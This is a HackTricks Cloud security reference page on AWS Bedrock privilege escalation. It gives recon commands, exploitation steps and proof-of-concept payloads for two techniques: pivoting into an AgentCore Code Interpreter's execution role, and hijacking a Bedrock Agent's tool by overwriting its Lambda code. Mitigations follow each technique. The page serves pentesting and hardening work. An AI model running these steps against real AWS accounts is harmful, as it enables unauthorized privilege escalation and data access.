🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
☁️ HackTricks Cloud / AWS - Bedrock PrivEsc

AWS - Bedrock PrivEsc

{{#include ../../../../banners/hacktricks-training.md}}

Amazon Bedrock AgentCore

bedrock-agentcore:StartCodeInterpreterSession + bedrock-agentcore:InvokeCodeInterpreter - Code Interpreter Execution-Role Pivot

AgentCore Code Interpreter is a managed execution environment. Custom Code Interpreters can be configured with an executionRoleArn that β€œprovides permissions for the code interpreter to access AWS services”.

If a lower-privileged IAM principal can start + invoke a Code Interpreter session that is configured with a more privileged execution role, the caller can effectively pivot into the execution role’s permissions (lateral movement / privilege escalation depending on role scope).

πŸ“ Note
This is typically a **misconfiguration / excessive permissions** issue (granting wide permissions to the interpreter execution role and/or granting broad invoke access). AWS explicitly warns to avoid privilege escalation by ensuring execution roles have **equal or fewer** privileges than identities allowed to invoke.

Preconditions (common misconfiguration)

  • A custom code interpreter exists with an over-privileged execution role (ex: access to sensitive S3/Secrets/SSM or IAM-admin-like capabilities).
  • A user (developer/auditor/CI identity) has permissions to:
  • start sessions: bedrock-agentcore:StartCodeInterpreterSession
  • invoke tools: bedrock-agentcore:InvokeCodeInterpreter
  • (Optional) The user can also create interpreters: bedrock-agentcore:CreateCodeInterpreter (lets them create a new interpreter configured with an execution role, depending on org guardrails).

Recon (identify custom interpreters and execution role usage)

List interpreters (control-plane) and inspect their configuration:

aws bedrock-agentcore-control list-code-interpreters
aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id <CODE_INTERPRETER_ID>

The create-code-interpreter command supports --execution-role-arn which defines what AWS permissions the interpreter will have.

Step 1 - Start a session (this returns a sessionId, not an interactive shell)

SESSION_ID=$(
  aws bedrock-agentcore start-code-interpreter-session \
    --code-interpreter-identifier <CODE_INTERPRETER_IDENTIFIER> \
    --name "arte-oussama" \
    --query sessionId \
    --output text
)

echo "SessionId: $SESSION_ID"

Step 2 - Invoke code execution (Boto3 or signed HTTPS)

There is no interactive python shell from start-code-interpreter-session. Execution happens via InvokeCodeInterpreter.

Option A - Boto3 example (execute Python + verify identity):

import boto3

client = boto3.client("bedrock-agentcore", region_name="<REGION>")

# Execute python inside the Code Interpreter session
resp = client.invoke_code_interpreter(
    codeInterpreterIdentifier="<CODE_INTERPRETER_IDENTIFIER>",
    sessionId="<SESSION_ID>",
    name="executeCode",
    arguments={
        "language": "python",
        "code": "import boto3; print(boto3.client('sts').get_caller_identity())"
    }
)

# Response is streamed; print events for visibility
for event in resp.get("stream", []):
    print(event)

If the interpreter is configured with an execution role, the sts:GetCallerIdentity() output should reflect that role’s identity (not the low-priv caller), demonstrating the pivot.

Option B - Signed HTTPS call (awscurl):

awscurl -X POST \
  "https://bedrock-agentcore.<Region>.amazonaws.com/code-interpreters/<CODE_INTERPRETER_IDENTIFIER>/tools/invoke" \
  -H "Content-Type: application/json" \
  -H "Accept: application/json" \
  -H "x-amzn-code-interpreter-session-id: <SESSION_ID>" \
  --service bedrock-agentcore \
  --region <Region> \
  -d '{
    "name": "executeCode",
    "arguments": {
      "language": "python",
      "code": "print(\"Hello from AgentCore\")"
    }
  }'

Impact

  • Lateral movement into whatever AWS access the interpreter execution role has.
  • Privilege escalation if the interpreter execution role is more privileged than the caller.
  • Harder detection if CloudTrail data events for interpreter invocations are not enabled (invocations may not be logged by default, depending on configuration).

Mitigations / Hardening

  • Least privilege on the interpreter executionRoleArn (treat it like Lambda execution roles / CI roles).
  • Restrict who can invoke (bedrock-agentcore:InvokeCodeInterpreter) and who can start sessions.
  • Use SCPs to deny InvokeCodeInterpreter except for approved agent runtime roles (org-level enforcement can be necessary).
  • Enable appropriate CloudTrail data events for AgentCore where applicable; alert on unexpected invocations and session creation.

Amazon Bedrock Agents

lambda:UpdateFunctionCode, bedrock:InvokeAgent - Agent Tool Hijacking via Lambda

Bedrock Agents can use Lambda-backed action groups as tools (external execution). If a principal can modify the code of a Lambda function used by an agent, and can then invoke the agent, they can execute attacker-controlled code under the Lambda execution role.

πŸ“ Note
This is a **cross-service trust abuse** (Bedrock β†’ Lambda), not a vulnerability. The attacker may not be able to invoke the Lambda directly, but can still trigger it via the agent.

Preconditions (common misconfiguration)

  • A Bedrock Agent exists with an action group backed by a Lambda function
  • The attacker has:
  • lambda:UpdateFunctionCode
  • bedrock:InvokeAgent
  • The Lambda execution role has broader permissions than the attacker
  • The attacker can identify the Lambda used by the agent

Recon

Enumerate agent action groups:

aws bedrock-agent list-agents
aws bedrock-agent get-agent --agent-id <AGENT_ID>
aws bedrock-agent list-agent-action-groups --agent-id <AGENT_ID> --agent-version DRAFT

Inspect Lambda:

aws lambda get-function --function-name <FUNCTION_NAME>

Exploitation

Replace Lambda code:

zip payload.zip lambda_function.py

aws lambda update-function-code \
  --function-name <FUNCTION_NAME> \
  --zip-file fileb://payload.zip

Example payload:

import boto3

def lambda_handler(event, context):
    return boto3.client("sts").get_caller_identity()

Trigger via agent:

aws bedrock-agent-runtime invoke-agent \
  --agent-id <AGENT_ID> \
  --agent-alias-id <ALIAS_ID> \
  --session-id test \
  --input-text "trigger tool"

Impact

  • Privilege escalation into Lambda execution role
  • Data exfiltration from AWS services
  • Cross-service abuse via trusted agent execution

Mitigations

  • Restrict lambda:UpdateFunctionCode
  • Use least-privilege Lambda roles
  • Monitor Lambda code changes
  • Audit Bedrock agent tool usage

References

{{#include ../../../../banners/hacktricks-training.md}}